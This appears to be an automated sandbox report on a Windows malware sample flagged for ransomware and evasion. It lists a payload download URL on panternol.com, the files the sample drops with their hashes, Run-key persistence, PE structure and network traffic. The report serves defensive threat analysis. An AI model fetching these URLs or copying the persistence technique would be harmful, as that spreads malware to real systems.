⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://panternol.com/backup/arqREQUEST_METHODpanternol.comiphlpapi.dll	0%	Avira URL Cloud	safe
https://panternol.com/cacher/https://panternol.com/cacher/panternol.com	0%	Avira URL Cloud	safe
https://panternol.com/backup/arqR	0%	Avira URL Cloud	safe
https://panternol.com/backup/arquivo1.zip	0%	Avira URL Cloud	safe
https://panterno1.1.1.1	0%	Avira URL Cloud	safe
https://panternol.com/cacher/	0%	Avira URL Cloud	safe
https://GODEBUGhttps://panterno1.1.1.1	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
panternol.com	34.95.207.248	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://panternol.com/backup/arquivo1.zip	false	Avira URL Cloud: safe	unknown
https://panternol.com/cacher/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://panternol.com/backup/arqREQUEST_METHODpanternol.comiphlpapi.dll	leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1981857921.000000C0000A8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.winimage.com/zLibDll	8pIuMUYQX9q.exe, 00000006.00000002.4145409860.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000006.00000002.4146358786.0000000002220000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145308802.0000000001398000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145573879.0000000002FA0000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145788826.0000000180064000.00000002.00001000.00020000.00000000.sdmp	false		high
https://GODEBUGhttps://panterno1.1.1.1	leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1981857921.000000C00008A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://panternol.com/backup/arqR	leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1981857921.000000C0000A8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://panterno1.1.1.1	leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1981857921.000000C00008A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.winimage.com/zLibDll1.3.1rbr	8pIuMUYQX9q.exe, 00000006.00000002.4145409860.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000006.00000002.4146358786.0000000002220000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145308802.0000000001398000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145573879.0000000002FA0000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145788826.0000000180064000.00000002.00001000.00020000.00000000.sdmp	false		high
https://panternol.com/cacher/https://panternol.com/cacher/panternol.com	leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1981857921.000000C000010000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
34.95.207.248	panternol.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562226
Start date and time:	2024-11-25 11:12:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	leg#U00edvel9931-009-140.08372236.exe renamed because original name is a hash value
Original Sample Name:	legvel9931-009-140.08372236.exe
Detection:	MAL
Classification:	mal64.rans.evad.winEXE@6/6@1/1
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target leg#U00edvel9931-009-140.08372236.exe, PID 7120 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: leg#U00edvel9931-009-140.08372236.exe

Simulations

Behavior and APIs

Time	Type	Description
05:13:36	API Interceptor	3251690x Sleep call for process: 8pIuMUYQX9q.exe modified
10:13:27	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ng3DJyCjjqIdyv C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe
10:13:36	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ng3DJyCjjqIdyv C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe (copy)	an#U00e9xo69338961197-0978.381.exe	Get hash	malicious	Unknown	Browse
	an#U00e9xo69338961197-0978.381.exe	Get hash	malicious	Unknown	Browse
	an#U00e9xo6896294663.32903578.exe	Get hash	malicious	Unknown	Browse
	an#U00e9xo3649-04519-11...13-6.exe	Get hash	malicious	Unknown	Browse
	an#U00e9xo6896294663.32903578.exe	Get hash	malicious	Unknown	Browse
	an#U00e9xo3649-04519-11...13-6.exe	Get hash	malicious	Unknown	Browse
	verifica#U00e7#U00e3o825--93765348-5376-305.exe	Get hash	malicious	Unknown	Browse
	verifica#U00e7#U00e3o825--93765348-5376-305.exe	Get hash	malicious	Unknown	Browse
	a#U00e7#U00e3o85-97.01865146941-6-9.7.exe	Get hash	malicious	Unknown	Browse
	a#U00e7#U00e3o85-97.01865146941-6-9.7.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe (copy)

Download File

Process:	C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	103736
Entropy (8bit):	5.912660682474699
Encrypted:	false
SSDEEP:	1536:OSz4xjHKQ9M2Q2ejqU0Fe/jPbnKaKlyXdWRpew3Wvv7dgKwd9nxCC:OSz4xjHK12QmPM/jPRXd0pOvv7uCC
MD5:	CCCA2C0E6653506652437868D1049817
SHA1:	C3B56B86ACE2FA1ADDDE2EC81D0087D31E12CF80
SHA-256:	625BB2074498952E01A21C2D54B9B9A4C0841F743E038799B907126980A984BE
SHA-512:	CC8E9B84AEAB7044829605BF7329EECCC9C8B595393B037FC5259CABE0D7BBCA07C559C8D2FB67282E482C3F369AB0B9F5236FE9D2E83F8D4110B822E6781F10
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: an#U00e9xo69338961197-0978.381.exe, Detection: malicious, Browse Filename: an#U00e9xo69338961197-0978.381.exe, Detection: malicious, Browse Filename: an#U00e9xo6896294663.32903578.exe, Detection: malicious, Browse Filename: an#U00e9xo3649-04519-11...13-6.exe, Detection: malicious, Browse Filename: an#U00e9xo6896294663.32903578.exe, Detection: malicious, Browse Filename: an#U00e9xo3649-04519-11...13-6.exe, Detection: malicious, Browse Filename: verifica#U00e7#U00e3o825--93765348-5376-305.exe, Detection: malicious, Browse Filename: verifica#U00e7#U00e3o825--93765348-5376-305.exe, Detection: malicious, Browse Filename: a#U00e7#U00e3o85-97.01865146941-6-9.7.exe, Detection: malicious, Browse Filename: a#U00e7#U00e3o85-97.01865146941-6-9.7.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!.~.!.~.!.~.(...D.~.(...(.~.(.....~.!...W.~.(.....~.?... .~.(... .~.Rich!.~.........................PE..d...H.K[..........".................p..........@....................................TH....@..........................................................@.. ....0..........8...............................................................0............................text.............................. ..`.rdata..X6.......8..................@..@.data...`6..........................@....pdata.......0......................@..@.rsrc... ....@......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\ClassicIEDLL_64.dll

Download File

Process:	C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	223232
Entropy (8bit):	6.173033180688752
Encrypted:	false
SSDEEP:	3072:ivClsW5twkJ42oa4iVYga9k47hA5sgXiOHPGkdleCLYI/jysM+S/J1Sf:eC8nFiVYNkAhA2HOvNDLEzS
MD5:	E209117B02C40306989D10488AB72222
SHA1:	FCE430A9873E5D19E1402D7791E4F58376D67CFC
SHA-256:	D10161C3D18B9B7A594547CBE31CA6F74D1D786356BB9C349FC0260EA22CEFBB
SHA-512:	BD0D6C10D60460BB10920BAFAC7552FE7828F6676E8A311150CA36806FFB6A308A644BF7458B0D2AFD83411BD87585AC046EDFC422DA898A14432E0788A442D3
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........5..[...[...[...X...[...^...[..._...[..mX...[..m_...[..m^...[...Z...[...Z...[.?mS...[.?m[...[.?m....[.?mY...[.Rich..[.........................PE..d....LDg.........." ...*.....N...... s....................................................`..........................................&.......'..<............p..."..............D.......8...............................@............@...............................text....-.......................... ..`.rdata.......@.......2..............@..@.data....+...@.......$..............@....pdata..."...p...$...8..............@..@.rsrc................\..............@..@.reloc..D............^..............@..B................................................................................................................................................................................................................................

C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\ClassicIE_64.exe

Download File

Process:	C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	103736
Entropy (8bit):	5.912660682474699
Encrypted:	false
SSDEEP:	1536:OSz4xjHKQ9M2Q2ejqU0Fe/jPbnKaKlyXdWRpew3Wvv7dgKwd9nxCC:OSz4xjHK12QmPM/jPRXd0pOvv7uCC
MD5:	CCCA2C0E6653506652437868D1049817
SHA1:	C3B56B86ACE2FA1ADDDE2EC81D0087D31E12CF80
SHA-256:	625BB2074498952E01A21C2D54B9B9A4C0841F743E038799B907126980A984BE
SHA-512:	CC8E9B84AEAB7044829605BF7329EECCC9C8B595393B037FC5259CABE0D7BBCA07C559C8D2FB67282E482C3F369AB0B9F5236FE9D2E83F8D4110B822E6781F10
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!.~.!.~.!.~.(...D.~.(...(.~.(.....~.!...W.~.(.....~.?... .~.(... .~.Rich!.~.........................PE..d...H.K[..........".................p..........@....................................TH....@..........................................................@.. ....0..........8...............................................................0............................text.............................. ..`.rdata..X6.......8..................@..@.data...`6..........................@....pdata.......0......................@..@.rsrc... ....@......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\FrontendCybersecurity.json

Download File

Process:	C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe
File Type:	data
Category:	dropped
Size (bytes):	570368
Entropy (8bit):	6.400963745231183
Encrypted:	false
SSDEEP:	12288:h1R0xeIhP4vZt8T9Hh3M5hUntpngB3v1a6TIGWVLWirPZ:rvIhP4vZtQzngB3v1a6T9WMQPZ
MD5:	6AD7971DACDC439C13AABFB7F581A71F
SHA1:	DA3540ACCCBF4010C606E8816440ED6CB8FCA7A0
SHA-256:	0C5CF459C7D21786E1704B33E9E3F9122A23CBB932444942A10B8F6A17B13672
SHA-512:	E9EBF36D42A4A5BB44A2B599A5C7CCC2B2463DF1D6E5C3937B7DDFAF72E6213EABCA1E86A43200CE19CAF30414B8B4FD6FA7B478098FA04DF6BB84B9FB4E07EA
Malicious:	false
Preview:	..p.............X................................................Z..T.-.X.-......................................................C..t...t...t...w...t...p...t...q...t...p...t...w...t...r...t...s...t...q..t...p...t...u...t...u...t...}...t...t...t......t.......t...v...t.......t............f..Cw.......................2......pq.........`.........................................................................................x................ ................<...Py.......................z.......x...................................................n..................................................................................................... ........... .........................................r....................................t.......................<...........H........................................................................................................................................................................................

C:\Users\user\Microsoft.NET\netframework4.7\version\ng3DJyCjjqIdyv.zip

Download File

Process:	C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	440438
Entropy (8bit):	7.995895056783209
Encrypted:	true
SSDEEP:	12288:YID6e1Y6tF28FBBp7aFrSL/9b50zWPFQP3QM2dAu4:YIDPXkIBAsT15nPFQPA4
MD5:	AC03FA739981A77B7E0BF69665A72475
SHA1:	99DBA4A87C48416AEF9F8643A44A0ACE65FB0744
SHA-256:	F26A27FE4775ABAAAAA291E6A2B1F14F61B6CF7E7CA060C52E325F0797F0CAAE
SHA-512:	DBD0E251BD44B8BD4E74F0EDA751E6BE88764A1FFF3652E8FA31F38A93E11B3D1B625CFF423273EDDE429A2566F0F656705B7B327D3AAE54894B22C768755191
Malicious:	false
Preview:	PK.........QyY........h......ClassicIEDLL_64.dll.y\|T..8~gK..p'.H..(Q.q....2..s...."......(.8.r=....m...Z.k...,...U%.......5.A..y.sgI.K.......G2..{.9.y.s.....n..$...LS..K.?....yl.4h..A.+..<g.M{.koY.?o..?[p...57.q...... \|G.-w...N...n.$+k`.....\..Fl./....U.W.w.l..a.....Uk^....L.s...._G..]..].;...k^..Yk6..3......U...b?.6..$.t_.....Y..K:7?.>.B...$]i.......\I%x...w.R.C ..W../....[..;..P{........!...<...).....$..v..;.....%.-....:...%......b......]'_../Yp...%i.....;......DT......8.~..}.5\2OT.1.X%$..~.\|.,X.....9......w.mwBE...J...s........,r..E..C2..h...P...3t+...}g.......U..l@.b..c..R......WF.d....s...M.7.7.,...E.......:.o][.vj..e....,..$67....%.....-P.].T'w ...5..aNx..K.]..UQ......[....F.....q8.n.3..S....Hb\.....%1.\|.x.....1..T.u.<e\_.q}...H..%..q...........Z...`..8....q.,.%.z.qf...8..q...:.K....t.g..\S.....24Qww..<x.=.?.__.....<L...3...\..P.QfB+...J. ...#An..rX..`..$M..@.::..-....y.O.S....jM...a.x..x...T.v...$..+...(...3`..r.P.34..

\Device\Null

Download File

Process:	C:\Windows\System32\shutdown.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	21
Entropy (8bit):	3.5585186130489066
Encrypted:	false
SSDEEP:	3:PgCu35QMvn:4H5Zvn
MD5:	F04BF601CD709679B7B1866BA0374184
SHA1:	D4BE33E6FE94052DCE99A1E1D6A2CD0759B98FCF
SHA-256:	BC5EFE3B7192E3DBA1CCCF5B0A6B382113290051775C43416180EF2227D0117B
SHA-512:	C4EB85EF169AA2CBFC4E9D5589484D0E74585825C0AA58521EE368269E9ECEF53C38B37D262C7ADB26A43A69B2CF67F58F6C1AA389291D639C4ED10B53396CB1
Malicious:	false
Preview:	Access is denied.(5).

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.344961274463145
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	leg#U00edvel9931-009-140.08372236.exe
File size:	11'252'752 bytes
MD5:	f8720f77959acda03bd5b2b4a3698848
SHA1:	1ea4f348e20d35774a7db6a89c3d8fc274a9892b
SHA256:	a8ba8a7be8a404f6398c3b3d5a3788f9e513210d0732fd5b0ffebc44af58de8b
SHA512:	624aea439e3241ce67c8e4ce021cfd42e23671bb8fd0d329ef3032ab75c50ab87ede302425e6e949fb16a7760716fcba293924ee7ed94a9f8673606280dbb4fa
SSDEEP:	196608:mMs70enJyd/wXY/rKQDM+vwmDUfm20Rmz8Bm:mf02awozDsmDrm4Bm
TLSH:	D6B6BE07ECA545A9D0E9D235CAA69253BB71BC480B3123D32F60F7782F76BD46A79301
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........0x......."......,'..........?........@..............................p............`... ............................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x473f80
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	d42595b695fc008ef2c56aabd8efd68e

Entrypoint Preview

Instruction
jmp 00007F1A49241CE0h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
dec eax
mov ebp, esp
pushfd
cld
dec eax
sub esp, 000000E0h
dec eax
mov dword ptr [esp], edi
dec eax
mov dword ptr [esp+08h], esi
dec eax
mov dword ptr [esp+10h], ebp
dec eax
mov dword ptr [esp+18h], ebx
dec esp
mov dword ptr [esp+20h], esp
dec esp
mov dword ptr [esp+28h], ebp
dec esp
mov dword ptr [esp+30h], esi
dec esp
mov dword ptr [esp+38h], edi
movups dqword ptr [esp+40h], xmm6
movups dqword ptr [esp+50h], xmm7
inc esp
movups dqword ptr [esp+60h], xmm0
inc esp
movups dqword ptr [esp+70h], xmm1
inc esp
movups dqword ptr [esp+00000080h], xmm2
inc esp
movups dqword ptr [esp+00000090h], xmm3
inc esp
movups dqword ptr [esp+000000A0h], xmm4
inc esp
movups dqword ptr [esp+000000B0h], xmm5
inc esp
movups dqword ptr [esp+000000C0h], xmm6
inc esp
movups dqword ptr [esp+000000D0h], xmm7
inc ebp
xorps xmm7, xmm7
dec ebp
xor esi, esi
dec eax
mov eax, dword ptr [00513D9Ah]
dec eax
mov eax, dword ptr [eax]
dec eax
cmp eax, 00000000h
je 00007F1A492455E5h
dec esp
mov esi, dword ptr [eax]
dec eax
sub esp, 10h
dec eax
mov eax, ecx
dec eax
mov ebx, edx
call 00007F1A4924DDDBh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7cd000	0x53e	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x58f000	0xe6d0	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7ce000	0xbe58	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x503260	0x178	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x272a46	0x272c00	147a505594acf6d9ebc328bea584b7c9	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x274000	0x28e370	0x28e400	b084dcd8a17fc62b508447d00b28d24f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x503000	0x8b1a0	0x3d600	aea363893daf6d2642c382157381ced2	False	0.36754152876782076	data	4.725247882182553	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x58f000	0xe6d0	0xe800	2ba05a65fa0ee90ee1ed073db7cd41f8	False	0.4037075700431034	data	5.434138709126083	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata	0x59e000	0xb4	0x200	6fa4e1544eb48a13efde0390e8c8647f	False	0.228515625	shared library	1.783206012798912	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
/4	0x59f000	0x14c	0x200	aaf28638a5fca2ae9b61c2d0ecb5c6e7	False	0.697265625	data	5.610479515469117	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/19	0x5a0000	0x7002f	0x70200	abf2b88c7af855ffaf3469e496abacd5	False	0.9993620227146043	data	7.996335785443399	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/32	0x611000	0x17750	0x17800	f377a9bc25648243fe4e63c8a9dfdfc3	False	0.996083361037234	data	7.9351138118097975	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/46	0x629000	0x30	0x200	40cca7c46fc713b4f088e5d440ca7931	False	0.103515625	data	0.8556848540171443	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/65	0x62a000	0xe71df	0xe7200	4927c46db6766d57f3e022404d425cc8	False	0.9993609298945376	data	7.997998778517862	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/78	0x712000	0x8fbab	0x8fc00	6b88c48efeb86fd1e088f37cc88df649	False	0.9931351902173913	data	7.995164776960389	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/90	0x7a2000	0x2a767	0x2a800	27cd2979399dcba4661bb5ec4f275b4d	False	0.9669864430147059	data	7.814224196737002	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.idata	0x7cd000	0x53e	0x600	8ae789759ede6f0fa2ab821e9f9db573	False	0.375	OpenPGP Public Key	4.003857513860982	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x7ce000	0xbe58	0xc000	2a500fb1ada70e6999ffe3edc49dca95	False	0.2554728190104167	data	5.4306700192222825	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab	0x7da000	0x5caa3	0x5cc00	1b5ac35e6812df5b6b0abccf688e4e92	False	0.22216665262803234	data	5.2929758161969565	IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

kernel32.dll

WriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, RtlVirtualUnwind, RtlLookupFunctionEntry, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler, AddVectoredContinueHandler

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 11:13:23.267396927 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:23.267441988 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:23.267540932 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:23.268220901 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:23.268234015 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:24.733427048 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:24.733866930 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:24.733896971 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:24.733920097 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:24.733925104 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:24.734992981 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:24.735110044 CET	49735	443	192.168.2.4	34.95.207.248
